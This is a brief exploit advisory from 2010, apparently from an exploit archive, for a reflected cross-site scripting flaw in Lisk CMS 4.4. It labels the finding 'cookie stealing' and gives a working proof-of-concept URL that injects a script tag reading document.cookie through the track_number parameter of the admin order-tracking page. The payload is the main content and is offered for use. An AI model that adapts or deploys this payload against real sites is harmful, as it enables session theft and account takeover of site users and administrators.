liskcms44-xss.txt
Posted on 22 May 2010
# [x] Author: Andrea Bocchetti # [x] Homepage : http://www.geekit.it // Software Info # [x] Name : Lisk cms # [x] Vendor : http://lisk-cms.com/ # [x] Version : 4.4 [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit Xss cookie stealing # # Demo exploit : http://lisk-cms.com/demo/admin/track_order/?track_number=<script>alert(document.cookie)</script>&imageField.x=26&imageField.y=10 # # track_number fields are potentially exploitable XSS # #EOF
